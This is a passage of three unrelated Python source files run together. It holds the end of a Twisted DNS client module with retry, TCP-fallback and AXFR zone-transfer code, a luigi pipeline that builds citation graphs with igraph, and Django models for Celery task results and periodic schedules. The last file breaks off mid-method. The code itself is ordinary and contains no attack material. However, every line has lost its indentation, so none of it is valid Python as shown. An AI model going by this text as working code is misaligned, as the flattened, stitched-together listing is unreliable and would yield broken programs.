# to the next longest timeout period and move all the
# "used" addresses back to the list of addresses to try.
if not addressesLeft:
addressesLeft = addressesUsed
addressesLeft.reverse()
addressesUsed = []
timeout = timeout[1:]
# If all timeout values have been used this query has failed. Tell the
# protocol we're giving up on it and return a terminal timeout failure
# to our caller.
if not timeout:
return failure.Failure(defer.TimeoutError(query))
# Get an address to try. Take it out of the list of addresses
# to try and put it ino the list of already tried addresses.
address = addressesLeft.pop()
addressesUsed.append(address)
# Issue a query to a server. Use the current timeout. Add this
# function as a timeout errback in case another retry is required.
d = self._query(address, query, timeout[0], reason.value.id)
d.addErrback(self._reissue, addressesLeft, addressesUsed, query, timeout)
return d
def queryTCP(self, queries, timeout = 10):
"""
Make a number of DNS queries via TCP.
@type queries: Any non-zero number of C{dns.Query} instances
@param queries: The queries to make.
@type timeout: C{int}
@param timeout: The number of seconds after which to fail.
@rtype: C{Deferred}
"""
if not len(self.connections):
address = self.pickServer()
if address is None:
return defer.fail(IOError("No domain name servers available"))
host, port = address
self._reactor.connectTCP(host, port, self.factory)
self.pending.append((defer.Deferred(), queries, timeout))
return self.pending[-1][0]
else:
return self.connections[0].query(queries, timeout)
def filterAnswers(self, message):
"""
Extract results from the given message.
If the message was truncated, re-attempt the query over TCP and return
a Deferred which will fire with the results of that query.
If the message's result code is not L{dns.OK}, return a Failure
indicating the type of error which occurred.
Otherwise, return a three-tuple of lists containing the results from
the answers section, the authority section, and the additional section.
"""
if message.trunc:
return self.queryTCP(message.queries).addCallback(self.filterAnswers)
if message.rCode != dns.OK:
return failure.Failure(self.exceptionForCode(message.rCode)(message))
return (message.answers, message.authority, message.additional)
def _lookup(self, name, cls, type, timeout):
"""
Build a L{dns.Query} for the given parameters and dispatch it via UDP.
If this query is already outstanding, it will not be re-issued.
Instead, when the outstanding query receives a response, that response
will be re-used for this query as well.
@type name: C{str}
@type type: C{int}
@type cls: C{int}
@return: A L{Deferred} which fires with a three-tuple giving the
answer, authority, and additional sections of the response or with
a L{Failure} if the response code is anything other than C{dns.OK}.
"""
key = (name, type, cls)
waiting = self._waiting.get(key)
if waiting is None:
self._waiting[key] = []
d = self.queryUDP([dns.Query(name, type, cls)], timeout)
def cbResult(result):
for d in self._waiting.pop(key):
d.callback(result)
return result
d.addCallback(self.filterAnswers)
d.addBoth(cbResult)
else:
d = defer.Deferred()
waiting.append(d)
return d
# This one doesn't ever belong on UDP
def lookupZone(self, name, timeout = 10):
"""
Perform an AXFR request. This is quite different from usual
DNS requests. See http://cr.yp.to/djbdns/axfr-notes.html for
more information.
"""
address = self.pickServer()
if address is None:
return defer.fail(IOError('No domain name servers available'))
host, port = address
d = defer.Deferred()
controller = AXFRController(name, d)
factory = DNSClientFactory(controller, timeout)
factory.noisy = False #stfu
connector = self._reactor.connectTCP(host, port, factory)
controller.timeoutCall = self._reactor.callLater(
timeout or 10, self._timeoutZone, d, controller,
connector, timeout or 10)
return d.addCallback(self._cbLookupZone, connector)
def _timeoutZone(self, d, controller, connector, seconds):
connector.disconnect()
controller.timeoutCall = None
controller.deferred = None
d.errback(error.TimeoutError("Zone lookup timed out after %d seconds" % (seconds,)))
def _cbLookupZone(self, result, connector):
connector.disconnect()
return (result, [], [])
class AXFRController:
timeoutCall = None
def __init__(self, name, deferred):
self.name = name
self.deferred = deferred
self.soa = None
self.records = []
def connectionMade(self, protocol):
# dig saids recursion-desired to 0, so I will too
message = dns.Message(protocol.pickID(), recDes=0)
message.queries = [dns.Query(self.name, dns.AXFR, dns.IN)]
protocol.writeMessage(message)
def connectionLost(self, protocol):
# XXX Do something here - see #3428
pass
def messageReceived(self, message, protocol):
# Caveat: We have to handle two cases: All records are in 1
# message, or all records are in N messages.
# According to http://cr.yp.to/djbdns/axfr-notes.html,
# 'authority' and 'additional' are always empty, and only
# 'answers' is present.
self.records.extend(message.answers)
if not self.records:
return
if not self.soa:
if self.records[0].type == dns.SOA:
#print "first SOA!"
self.soa = self.records[0]
if len(self.records) > 1 and self.records[-1].type == dns.SOA:
#print "It's the second SOA! We're done."
if self.timeoutCall is not None:
self.timeoutCall.cancel()
self.timeoutCall = None
if self.deferred is not None:
self.deferred.callback(self.records)
self.deferred = None
from twisted.internet.base import ThreadedResolver as _ThreadedResolverImpl
class ThreadedResolver(_ThreadedResolverImpl):
def __init__(self, reactor=None):
if reactor is None:
from twisted.internet import reactor
_ThreadedResolverImpl.__init__(self, reactor)
warnings.warn(
"twisted.names.client.ThreadedResolver is deprecated since "
"Twisted 9.0, use twisted.internet.base.ThreadedResolver "
"instead.",
category=DeprecationWarning, stacklevel=2)
class DNSClientFactory(protocol.ClientFactory):
def __init__(self, controller, timeout = 10):
self.controller = controller
self.timeout = timeout
def clientConnectionLost(self, connector, reason):
pass
def buildProtocol(self, addr):
p = dns.DNSProtocol(self.controller)
p.factory = self
return p
def createResolver(servers=None, resolvconf=None, hosts=None):
"""
Create and return a Resolver.
@type servers: C{list} of C{(str, int)} or C{None}
@param servers: If not C{None}, interpreted as a list of addresses of
domain name servers to attempt to use. Addresses should be in dotted-quad
form.
@type resolvconf: C{str} or C{None}
@param resolvconf: If not C{None}, on posix systems will be interpreted as
an alternate resolv.conf to use. Will do nothing on windows systems. If
C{None}, /etc/resolv.conf will be used.
@type hosts: C{str} or C{None}
@param hosts: If not C{None}, an alternate hosts file to use. If C{None}
on posix systems, /etc/hosts will be used. On windows, C:\windows\hosts
will be used.
@rtype: C{IResolver}
"""
from twisted.names import resolve, cache, root, hosts as hostsModule
if platform.getType() == 'posix':
if resolvconf is None:
resolvconf = '/etc/resolv.conf'
if hosts is None:
hosts = '/etc/hosts'
theResolver = Resolver(resolvconf, servers)
hostResolver = hostsModule.Resolver(hosts)
else:
if hosts is None:
hosts = r'c:\windows\hosts'
from twisted.internet import reactor
bootstrap = _ThreadedResolverImpl(reactor)
hostResolver = hostsModule.Resolver(hosts)
theResolver = root.bootstrap(bootstrap)
L = [hostResolver, cache.CacheResolver(), theResolver]
return resolve.ResolverChain(L)
theResolver = None
def getResolver():
"""
Get a Resolver instance.
Create twisted.names.client.theResolver if it is C{None}, and then return
that value.
@rtype: C{IResolver}
"""
global theResolver
if theResolver is None:
try:
theResolver = createResolver()
except ValueError:
theResolver = createResolver(servers=[('127.0.0.1', 53)])
return theResolver
def getHostByName(name, timeout=None, effort=10):
"""
Resolve a name to a valid ipv4 or ipv6 address.
Will errback with C{DNSQueryTimeoutError} on a timeout, C{DomainError} or
C{AuthoritativeDomainError} (or subclasses) on other errors.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@type effort: C{int}
@param effort: How many times CNAME and NS records to follow while
resolving this name.
@rtype: C{Deferred}
"""
return getResolver().getHostByName(name, timeout, effort)
def lookupAddress(name, timeout=None):
"""
Perform an A record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupAddress(name, timeout)
def lookupIPV6Address(name, timeout=None):
"""
Perform an AAAA record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupIPV6Address(name, timeout)
def lookupAddress6(name, timeout=None):
"""
Perform an A6 record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupAddress6(name, timeout)
def lookupMailExchange(name, timeout=None):
"""
Perform an MX record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupMailExchange(name, timeout)
def lookupNameservers(name, timeout=None):
"""
Perform an NS record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupNameservers(name, timeout)
def lookupCanonicalName(name, timeout=None):
"""
Perform a CNAME record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupCanonicalName(name, timeout)
def lookupMailBox(name, timeout=None):
"""
Perform an MB record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupMailBox(name, timeout)
def lookupMailGroup(name, timeout=None):
"""
Perform an MG record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupMailGroup(name, timeout)
def lookupMailRename(name, timeout=None):
"""
Perform an MR record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupMailRename(name, timeout)
def lookupPointer(name, timeout=None):
"""
Perform a PTR record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupPointer(name, timeout)
def lookupAuthority(name, timeout=None):
"""
Perform an SOA record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupAuthority(name, timeout)
def lookupNull(name, timeout=None):
"""
Perform a NULL record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupNull(name, timeout)
def lookupWellKnownServices(name, timeout=None):
"""
Perform a WKS record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupWellKnownServices(name, timeout)
def lookupService(name, timeout=None):
"""
Perform an SRV record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupService(name, timeout)
def lookupHostInfo(name, timeout=None):
"""
Perform a HINFO record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupHostInfo(name, timeout)
def lookupMailboxInfo(name, timeout=None):
"""
Perform an MINFO record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupMailboxInfo(name, timeout)
def lookupText(name, timeout=None):
"""
Perform a TXT record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupText(name, timeout)
def lookupResponsibility(name, timeout=None):
"""
Perform an RP record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupResponsibility(name, timeout)
def lookupAFSDatabase(name, timeout=None):
"""
Perform an AFSDB record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupAFSDatabase(name, timeout)
def lookupZone(name, timeout=None):
"""
Perform an AXFR record lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: C{int}
@param timeout: When this timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
# XXX: timeout here is not a list of ints, it is a single int.
return getResolver().lookupZone(name, timeout)
def lookupAllRecords(name, timeout=None):
"""
ALL_RECORD lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupAllRecords(name, timeout)
def lookupNamingAuthorityPointer(name, timeout=None):
"""
NAPTR lookup.
@type name: C{str}
@param name: DNS name to resolve.
@type timeout: Sequence of C{int}
@param timeout: Number of seconds after which to reissue the query.
When the last timeout expires, the query is considered failed.
@rtype: C{Deferred}
"""
return getResolver().lookupNamingAuthorityPointer(name, timeout)
| |
import csv
import pandas as pd
import igraph
import luigi
import util
import aminer
import filtering
import config
class YearFilterableTask(util.YearFilterableTask):
@property
def base_dir(self):
return config.graph_dir
class BuildPaperCitationGraph(YearFilterableTask):
"""Build the citation graph for all papers. For each paper, a link is drawn
between it and all of its references. The venue of its publication and its
list of authors are added as node attributes. The graph is saved in both
pickle.gz and graphml.gz format. Both formats are used because pickle allows
inclusion of the `author_ids` attributes of the nodes, which consists of a
list of all authors of the paper. Graphml on the other hand, is a simpler
and more space-efficient format, which will only save the venues as node
attributes.
"""
def requires(self):
# TODO: consider using single dependency on FilterPapersToYearRange
return (filtering.FilteredCSVPapers(self.start, self.end),
filtering.FilteredCSVRefs(self.start, self.end),
filtering.FilterAuthorshipsToYearRange(self.start, self.end))
@property
def papers_file(self):
return self.input()[0]
@property
def refs_file(self):
return self.input()[1]
@property
def author_file(self):
return self.input()[2]
@property
def base_paths(self):
return ('paper-citation-graph.pickle.gz',
'paper-citation-graph.graphml.gz',
'paper-id-to-node-id-map.csv')
@property
def pickle_output_file(self):
return self.output()[0]
@property
def graphml_output_file(self):
return self.output()[1]
@property
def idmap_output_file(self):
return self.output()[2]
def read_paper_vertices(self):
"""Iterate through paper IDs from the paper csv file."""
with self.papers_file.open() as papers_file:
papers_df = pd.read_csv(papers_file, header=0, usecols=(0,))
return papers_df['id'].values
def read_paper_venues(self):
"""Iterate through (paper_id, venue) pairs from the paper csv file."""
for record in util.iter_csv_fwrapper(self.papers_file):
yield (record[0], record[2])
def read_paper_references(self, idmap):
"""Filter out references to papers outside dataset."""
for paper_id, ref_id in util.iter_csv_fwrapper(self.refs_file):
try: yield (idmap[paper_id], idmap[ref_id])
except: pass
def run(self):
refg = igraph.Graph()
nodes = self.read_paper_vertices()
refg.add_vertices(nodes)
# Build and save paper id to node id mapping
idmap = {str(v['name']): v.index for v in refg.vs}
rows = sorted(idmap.items())
util.write_csv_to_fwrapper(
self.idmap_output_file, ('paper_id', 'node_id'), rows)
# Now add venues to nodes as paper attributes
for paper_id, venue in self.read_paper_venues():
node_id = idmap[paper_id]
refg.vs[node_id]['venue'] = venue
# next add author ids
for v in refg.vs:
v['author_ids'] = []
for author_id, paper_id in util.iter_csv_fwrapper(self.author_file):
node_id = idmap[paper_id]
refg.vs[node_id]['author_ids'].append(author_id)
# Finally add edges from citation records
citation_links = self.read_paper_references(idmap)
refg.add_edges(citation_links)
# Save in both pickle and graphml formats
refg.write_picklez(self.pickle_output_file.path)
refg.write_graphmlz(self.graphml_output_file.path)
return refg
class PickledPaperCitationGraph(YearFilterableTask):
def requires(self):
return BuildPaperCitationGraph(self.start, self.end)
def output(self):
pickle_file = self.input()[0]
return luigi.LocalTarget(pickle_file.path)
class PaperCitationGraphIdmap(YearFilterableTask):
def requires(self):
return BuildPaperCitationGraph(self.start, self.end)
def output(self):
idmap_file = self.input()[2]
return luigi.LocalTarget(idmap_file.path)
class BuildAuthorCitationGraph(YearFilterableTask):
"""Build the author citation graph from the paper citation graph and the
authorship csv records.
"""
def requires(self):
return (filtering.FilterAuthorshipsToYearRange(self.start, self.end),
PaperCitationGraphIdmap(self.start, self.end),
PickledPaperCitationGraph(self.start, self.end))
@property
def author_file(self):
return self.input()[0]
@property
def paper_idmap_file(self):
return self.input()[1]
@property
def paper_graph_file(self):
return self.input()[2]
@property
def base_paths(self):
return ('author-citation-graph.graphml.gz',
'author-id-to-node-id-map.csv')
def read_author_ids(self):
"""Read author ids from author file and return as strings (for easy
reference when adding edges).
"""
with self.author_file.open() as f:
df = pd.read_csv(f, header=0, usecols=(0,))
return df['author_id'].astype(str).values
def get_edges(self):
"""Return all edges from a file in which each line contains an (author,
paper) pair."""
records = util.iter_csv_fwrapper(self.paper_idmap_file)
idmap = {record[0]: int(record[1]) for record in records}
refg = igraph.Graph.Read_Picklez(self.paper_graph_file.open())
records = util.iter_csv_fwrapper(self.author_file)
rows = ((refg, idmap[paper_id], author_id)
for author_id, paper_id in records)
while True:
edges = self.get_paper_edges(*rows.next())
for edge in edges:
yield edge
def get_paper_edges(self, refg, paper_id, author_id):
"""Return a list of author-to-author edges for each paper."""
node = refg.vs[paper_id]
neighbors = node.neighbors()
author_lists = [n['author_ids'] for n in neighbors]
if not author_lists: return []
authors = reduce(lambda x,y: x+y, author_lists)
return zip([author_id]*len(authors), authors)
def run(self):
nodes = self.read_author_ids()
edges = self.get_edges()
authorg = util.build_undirected_graph(nodes, edges)
# Now write the graph to gzipped graphml file.
graph_output_file, idmap_output_file = self.output()
authorg.write_graphmlz(graph_output_file.path)
# Finally, build and save the ID map.
idmap = {v['name']: v.index for v in authorg.vs}
rows = sorted(idmap.items())
util.write_csv_to_fwrapper(
idmap_output_file, ('author_id', 'node_id'), rows)
class WriteLCCAuthorCitationGraph(YearFilterableTask):
"""Find the largest connected component in the author citation graph."""
def requires(self):
return BuildAuthorCitationGraph(self.start, self.end)
@property
def base_paths(self):
return ('lcc-author-citation-graph.graphml.gz',
'lcc-author-citation-graph.edgelist.txt',
'lcc-author-id-to-node-id-map.csv')
def run(self):
graphml_outfile, edgelist_outfile, idmap_outfile = self.output()
author_graph_file, _ = self.input()
# Read graph, find LCC, and save as graphml and edgelist
authorg = igraph.Graph.Read_GraphMLz(author_graph_file.path)
components = authorg.components()
lcc = components.giant()
lcc.write_graphmlz(graphml_outfile.path)
lcc.write_edgelist(edgelist_outfile.path)
# Build and save id map.
idmap = {v['name']: v.index for v in lcc.vs}
rows = sorted(idmap.items())
util.write_csv_to_fwrapper(
idmap_outfile, ('author_id', 'node_id'), rows)
class AuthorCitationGraphLCCGraphml(YearFilterableTask):
def requires(self):
return WriteLCCAuthorCitationGraph(self.start, self.end)
def output(self):
return self.input()[0]
class AuthorCitationGraphLCCIdmap(YearFilterableTask):
def requires(self):
return WriteLCCAuthorCitationGraph(self.start, self.end)
def output(self):
return self.input()[2]
class AddVenuesToAuthorCitationGraph(YearFilterableTask):
"""Build up ground truth communities using venue info for LCC."""
def requires(self):
return (AuthorCitationGraphLCCGraphml(self.start, self.end),
AuthorCitationGraphLCCIdmap(self.start, self.end),
filtering.FilteredCSVPapers(self.start, self.end),
filtering.FilterAuthorshipsToYearRange(self.start, self.end))
@property
def base_paths(self):
return ('lcc-author-citation-graph.pickle.gz',
'lcc-venue-id-map.csv')
def build_linked_venue_frame(self):
"""Join the author and paper data records in order to map authors to
venues."""
_, idmap_file, paper_file, author_file = self.input()
# Read in authorship and venue records, with common paper_id for join
with author_file.open() as author_fd, paper_file.open() as paper_fd:
author_df = pd.read_table(
author_fd, sep=",", header=0,
usecols=('author_id', 'paper_id'))
paper_df = pd.read_table(
paper_fd, sep=",", header=0,
usecols=('id', 'venue'))
paper_df.columns = ('paper_id', 'venue')
# filter authors down to those in LCC
with idmap_file.open() as author_fd:
lcc_author_df = pd.read_csv(author_fd, header=0, usecols=(0,))
lcc_author_ids = lcc_author_df['author_id'].values
# Filter based on LCC author ids
selection = author_df['author_id'].isin(lcc_author_ids)
author_df = author_df[selection]
merge_df = author_df.merge(paper_df)
del merge_df['paper_id'] # only need (author_id, venue) pairs
return merge_df
def assign_venue_ids(self, author_venue_df):
"""Assign each venue an id and save the assignment."""
_, venue_map_file = self.output()
unique_venues = author_venue_df['venue'].unique()
unique_venues.sort()
venue_map = {venue: vnum for vnum, venue in enumerate(unique_venues)}
return venue_map
def run(self):
graph_file, idmap_file, paper_file, author_file = self.input()
# Read in dependencies
lcc = igraph.Graph.Read_GraphMLz(graph_file.path)
author_venue_df = self.build_linked_venue_frame()
venue_map = self.assign_venue_ids(author_venue_df)
records = util.iter_csv_fwrapper(idmap_file)
lcc_idmap = {record[0]: int(record[1]) for record in records}
# Use sets in order to ensure uniqueness.
for v in lcc.vs:
v['venues'] = set()
# Add the venue IDs to the node venue sets.
for rownum, (author_id, venue) in author_venue_df.iterrows():
node_id = lcc_idmap[str(author_id)]
venue_id = venue_map[venue]
lcc.vs[node_id]['venues'].add(venue_id)
# Convert the sets to tuples.
for v in lcc.vs:
v['venues'] = tuple(v['venues'])
# save a copy of the graph with venue info
pickle_outfile, venue_map_outfile = self.output()
lcc.write_picklez(pickle_outfile.path) # lcc-author-citation-graph
rows = ((vnum, venue) for venue, vnum in venue_map.iteritems())
util.write_csv_to_fwrapper(
venue_map_outfile, ('venue_id', 'venue_name'), rows)
class BuildGroundTruthCommunities(YearFilterableTask):
"""Build ground truth communities from the graph using the venue id
mapping.
"""
def requires(self):
return AddVenuesToAuthorCitationGraph(self.start, self.end)
@property
def base_paths(self):
return ('lcc-ground-truth-by-venue.txt',
'lcc-author-venues.txt')
def run(self):
lcc_pickle_file, venue_map_file = self.input()
# Read in the LCC graph
lcc = igraph.Graph.Read_Picklez(lcc_pickle_file.path)
# Build the community mapping:
# each venue id is mapped to one or more node ids (the community)
records = util.iter_csv_fwrapper(venue_map_file)
communities = {int(venue_id): [] for venue_id, _ in records}
for v in lcc.vs:
for venue_id in v['venues']:
communities[venue_id].append(v.index)
# retrieve output files
by_venue_file, by_author_file = self.output()
# save ground truth communities
comms = sorted(communities.items())
rows = (' '.join(map(str, comm)) for comm_num, comm in comms)
with by_venue_file.open('w') as f:
f.write('\n'.join(rows))
# save venue info for each author separately
records = sorted([(v.index, v['venues']) for v in lcc.vs])
rows = (' '.join(map(str, venues)) for node_id, venues in records)
with by_author_file.open('w') as f:
f.write('\n'.join(rows))
class BuildAllGraphData(luigi.Task):
"""Build all the graph data with one single task."""
start = luigi.IntParameter(default=None)
end = luigi.IntParameter(default=None)
def requires(self):
yield BuildGroundTruthCommunities(self.start, self.end)
if __name__ == "__main__":
luigi.run()
| |
from __future__ import absolute_import, unicode_literals
from datetime import timedelta, datetime
from time import time, mktime, gmtime
from django.core.exceptions import MultipleObjectsReturned, ValidationError
from django.db import models
from django.db.models import signals
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from celery import schedules
from celery import states
from celery.events.state import heartbeat_expires
from . import managers
from .picklefield import PickledObjectField
from .utils import fromtimestamp, now
from .compat import python_2_unicode_compatible
ALL_STATES = sorted(states.ALL_STATES)
TASK_STATE_CHOICES = zip(ALL_STATES, ALL_STATES)
@python_2_unicode_compatible
class TaskMeta(models.Model):
"""Task result/status."""
task_id = models.CharField(_('task id'), max_length=255, unique=True)
status = models.CharField(
_('state'),
max_length=50, default=states.PENDING, choices=TASK_STATE_CHOICES,
)
result = PickledObjectField(null=True, default=None, editable=False)
date_done = models.DateTimeField(_('done at'), auto_now=True)
traceback = models.TextField(_('traceback'), blank=True, null=True)
hidden = models.BooleanField(editable=False, default=False, db_index=True)
# TODO compression was enabled by mistake, we need to disable it
# but this is a backwards incompatible change that needs planning.
meta = PickledObjectField(
compress=True, null=True, default=None, editable=False,
)
objects = managers.TaskManager()
class Meta:
verbose_name = _('task state')
verbose_name_plural = _('task states')
db_table = 'celery_taskmeta'
def to_dict(self):
return {'task_id': self.task_id,
'status': self.status,
'result': self.result,
'date_done': self.date_done,
'traceback': self.traceback,
'children': (self.meta or {}).get('children')}
def __str__(self):
return '<Task: {0.task_id} state={0.status}>'.format(self)
@python_2_unicode_compatible
class TaskSetMeta(models.Model):
"""TaskSet result"""
taskset_id = models.CharField(_('group id'), max_length=255, unique=True)
result = PickledObjectField()
date_done = models.DateTimeField(_('created at'), auto_now=True)
hidden = models.BooleanField(editable=False, default=False, db_index=True)
objects = managers.TaskSetManager()
class Meta:
"""Model meta-data."""
verbose_name = _('saved group result')
verbose_name_plural = _('saved group results')
db_table = 'celery_tasksetmeta'
def to_dict(self):
return {'taskset_id': self.taskset_id,
'result': self.result,
'date_done': self.date_done}
def __str__(self):
return '<TaskSet: {0.taskset_id}>'.format(self)
PERIOD_CHOICES = (('days', _('Days')),
('hours', _('Hours')),
('minutes', _('Minutes')),
('seconds', _('Seconds')),
('microseconds', _('Microseconds')))
@python_2_unicode_compatible
class IntervalSchedule(models.Model):
every = models.IntegerField(_('every'), null=False)
period = models.CharField(
_('period'), max_length=24, choices=PERIOD_CHOICES,
)
class Meta:
verbose_name = _('interval')
verbose_name_plural = _('intervals')
ordering = ['period', 'every']
@property
def schedule(self):
return schedules.schedule(timedelta(**{self.period: self.every}))
@classmethod
def from_schedule(cls, schedule, period='seconds'):
every = max(schedule.run_every.total_seconds(), 0)
try:
return cls.objects.get(every=every, period=period)
except cls.DoesNotExist:
return cls(every=every, period=period)
except MultipleObjectsReturned:
cls.objects.filter(every=every, period=period).delete()
return cls(every=every, period=period)
def __str__(self):
if self.every == 1:
return _('every {0.period_singular}').format(self)
return _('every {0.every} {0.period}').format(self)
@property
def period_singular(self):
return self.period[:-1]
@python_2_unicode_compatible
class CrontabSchedule(models.Model):
minute = models.CharField(_('minute'), max_length=64, default='*')
hour = models.CharField(_('hour'), max_length=64, default='*')
day_of_week = models.CharField(
_('day of week'), max_length=64, default='*',
)
day_of_month = models.CharField(
_('day of month'), max_length=64, default='*',
)
month_of_year = models.CharField(
_('month of year'), max_length=64, default='*',
)
class Meta:
verbose_name = _('crontab')
verbose_name_plural = _('crontabs')
ordering = ['month_of_year', 'day_of_month',
'day_of_week', 'hour', 'minute']
def __str__(self):
rfield = lambda f: f and str(f).replace(' ', '') or '*'
return '{0} {1} {2} {3} {4} (m/h/d/dM/MY)'.format(
rfield(self.minute), rfield(self.hour), rfield(self.day_of_week),
rfield(self.day_of_month), rfield(self.month_of_year),
)
@property
def schedule(self):
return schedules.crontab(minute=self.minute,
hour=self.hour,
day_of_week=self.day_of_week,
day_of_month=self.day_of_month,
month_of_year=self.month_of_year)
@classmethod
def from_schedule(cls, schedule):
spec = {'minute': schedule._orig_minute,
'hour': schedule._orig_hour,
'day_of_week': schedule._orig_day_of_week,
'day_of_month': schedule._orig_day_of_month,
'month_of_year': schedule._orig_month_of_year}
try:
return cls.objects.get(**spec)
except cls.DoesNotExist:
return cls(**spec)
except MultipleObjectsReturned:
cls.objects.filter(**spec).delete()
return cls(**spec)
class PeriodicTasks(models.Model):
ident = models.SmallIntegerField(default=1, primary_key=True, unique=True)
last_update = models.DateTimeField(null=False)
objects = managers.ExtendedManager()
@classmethod
def changed(cls, instance, **kwargs):
if not instance.no_changes:
cls.objects.update_or_create(ident=1,
defaults={'last_update': now()})
@classmethod
def last_change(cls):
try:
return cls.objects.get(ident=1).last_update
except cls.DoesNotExist:
pass
@python_2_unicode_compatible
class PeriodicTask(models.Model):
name = models.CharField(
_('name'), max_length=200, unique=True,
help_text=_('Useful description'),
)
task = models.CharField(_('task name'), max_length=200)
interval = models.ForeignKey(
IntervalSchedule,
null=True, blank=True, verbose_name=_('interval'),
)
crontab = models.ForeignKey(
CrontabSchedule, null=True, blank=True, verbose_name=_('crontab'),
help_text=_('Use one of interval/crontab'),
)
args = models.TextField(
_('Arguments'), blank=True, default='[]',
help_text=_('JSON encoded positional arguments'),
)
kwargs = models.TextField(
_('Keyword arguments'), blank=True, default='{}',
help_text=_('JSON encoded keyword arguments'),
)
queue = models.CharField(
_('queue'), max_length=200, blank=True, null=True, default=None,
help_text=_('Queue defined in CELERY_QUEUES'),
)
exchange = models.CharField(
_('exchange'), max_length=200, blank=True, null=True, default=None,
)
routing_key = models.CharField(
_('routing key'), max_length=200, blank=True, null=True, default=None,
)
expires = models.DateTimeField(
_('expires'), blank=True, null=True,
)
enabled = models.BooleanField(
_('enabled'), default=True,
)
last_run_at = models.DateTimeField(
auto_now=False, auto_now_add=False,
editable=False, blank=True, null=True,
)
total_run_count = models.PositiveIntegerField(
default=0, editable=False,
)
date_changed = models.DateTimeField(auto_now=True)
description = models.TextField(_('description'), blank=True)
objects = managers.PeriodicTaskManager()
no_changes = False
class Meta:
verbose_name = _('periodic task')
verbose_name_plural = _('periodic tasks')
def validate_unique(self, *args, **kwargs):
super(PeriodicTask, self).validate_unique(*args, **kwargs)
if not self.interval and not self.crontab:
raise ValidationError(
{'interval': ['One of interval or crontab must be set.']})
if self.interval and self.crontab:
raise ValidationError(
{'crontab': ['Only one of interval or crontab must be set']})
def save(self, *args, **kwargs):
self.exchange = self.exchange or None
self.routing_key = self.routing_key or None
self.queue = self.queue or None
if not self.enabled:
self.last_run_at = None
super(PeriodicTask, self).save(*args, **kwargs)
def __str__(self):
fmt = '{0.name}: {{no schedule}}'
if self.interval:
fmt = '{0.name}: {0.interval}'
if self.crontab:
